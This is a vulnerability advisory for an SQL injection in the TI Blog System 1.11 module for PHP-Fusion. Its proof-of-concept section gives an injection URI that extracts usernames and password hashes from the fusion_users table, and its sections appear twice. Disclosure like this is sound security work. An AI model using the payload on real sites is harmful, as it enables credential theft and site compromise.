PHP-Fusion TI Blog System Module 'blog.php' SQL Injection Vulnerability
BID:33019
Info
PHP-Fusion TI Blog System Module 'blog.php' SQL Injection Vulnerability
| Bugtraq ID: | 33019 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 25 2008 12:00AM |
| Updated: | Dec 31 2008 05:31PM |
| Credit: | Sina Yazdanmehr |
| Vulnerable: |
Team Impact TI Blog System 1.11 |
| Not Vulnerable: | |
Discussion
PHP-Fusion TI Blog System Module 'blog.php' SQL Injection Vulnerability
TI Blog System is prone to an SQL-injection vulnerability affecting the 'manuals' module because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
TI Blog System is prone to an SQL-injection vulnerability affecting the 'manuals' module because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PHP-Fusion TI Blog System Module 'blog.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
Solution / Fix
PHP-Fusion TI Blog System Module 'blog.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP-Fusion TI Blog System Module 'blog.php' SQL Injection Vulnerability
References:
References:
- PHP-Fusion Homepage (PHP-Fusion)
- TI Blog System Product Page (Team Impact)
- PHP-Fusion Mod TI - Blog System Sql Injection ([email protected])